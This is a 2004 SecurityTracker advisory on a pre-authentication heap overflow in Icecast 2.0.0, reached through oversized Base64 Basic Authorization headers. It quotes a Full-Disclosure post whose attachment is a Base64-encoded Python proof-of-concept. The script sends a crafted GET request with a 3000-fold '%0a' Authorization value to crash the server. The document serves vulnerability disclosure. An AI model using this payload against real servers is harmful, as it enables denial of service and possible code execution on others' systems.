icecast Heap Overflow in Processing Basic Authentication Lets Remote Users Crash the Service
|
|
SecurityTracker Alert ID: 1010101 |
|
SecurityTracker URL: http://securitytracker.com/id/1010101
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 10 2004
|
Impact:
Denial of service via network, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.0.0
|
Description:
A heap overflow vulnerability was reported in icecast. A remote user can cause the icecast service to crash and may be able to execute arbitrary code on the target system [but code execution was not confirmed in the report].
ned reported that the flaw resides in the processing of Base64 HTTP Basic Authorization request. A remote user can send a specially crafted HTTP GET request to trigger the overflow and cause the target service to crash.
A demonstration exploit script is provided in the Source Message [it is Base64 encoded].
The vendor has reportedly been notified.
|
Impact:
A remote user can cause the target service to crash. A remote user may be able to execute arbitrary code [but that was not confirmed in the report].
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.icecast.org/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Sun, 9 May 2004 05:56:32 -0700 (PDT)
Subject: [Full-Disclosure] Icecast 2.0.0 preauth overflow
|
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-1325314640-1084107392=:6785
Content-Type: TEXT/PLAIN; charset=US-ASCII
There exists a remotely exploitable heap overflow in Icecast 2.0.0.
The bug exists in the handling of base64 Authorization request.
This bug was found in about 40 seconds during a HTTP audit of the web
component of Icecast with the fuzzer SMUDGE
(http://felinemenace.org/~nd/SMUDGE/)
People complained that the last Icecast bugs weren't preauth. This one is.
Attached is a simple python script to reproduce the bug on the Windows
platform. Our tests confirmed that some tweaking will crash linux version
although this was not verified by the Icecast team.
Vendor == notified.
On another note tis signifies the first release from the UBC.
thanks,
nd.
--
http://felinemenace.org/~nd
--0-1325314640-1084107392=:6785
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="CAKEICING.py"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.44.0405090556320.6785@scratch>
Content-Description:
Content-Disposition: attachment; filename="CAKEICING.py"
IyB3aWxsIGNyYXNoIHdpbmRvd3MgSWNlQ2FzdCAyLjAuMA0KIyBmbUBmZWxp
bmVtZW5hY2Uub3JnLCAyMDA0DQoNCmltcG9ydCBzb2NrZXQNCg0KcmVxID0g
IkdFVCAvYWRtaW4vIEhUVFAvMS4wXHJcbiINCnJlcSArPSAiQ29ubmVjdGlv
bjogS2VlcC1BbGl2ZVxyXG4iDQpyZXEgKz0gIlVzZXItQWdlbnQ6IE1vemls
bGEvNC43NiBbZW5dIChYMTE7IFU7IExpbnV4IDIuNC4yLTIgaTY4Nilcclxu
Ig0KcmVxICs9ICJIb3N0OiAxNjkuMjU0LjE2NS4xMzI6ODAwMFxyXG4iDQpy
ZXEgKz0gIkFjY2VwdDogaW1hZ2UvZ2lmLCBpbWFnZS94LXhiaXRtYXAsIGlt
YWdlL2pwZWcsIGltYWdlL3BqcGVnLCBpbWFnZS9wbmcsICovKlxyXG4iDQpy
ZXEgKz0gIkFjY2VwdC1FbmNvZGluZzogZ3ppcFxyXG4iDQpyZXEgKz0gIkFj
Y2VwdC1MYW5ndWFnZTogZW5cclxuIg0KcmVxICs9ICJBY2NlcHQtQ2hhcnNl
dDogaXNvLTg4NTktMSwqLHV0Zi04XHJcbiINCnJlcSArPSAiQXV0aG9yaXph
dGlvbjogQmFzaWMgIiArICgiJTBhIiAqIDMwMDApDQpzID0gc29ja2V0LnNv
Y2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNv
bm5lY3QoKCIxMjcuMC4wLjEiLDgwMDApKQ0Kcy5zZW5kKHJlcSkNCg==
--0-1325314640-1084107392=:6785--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
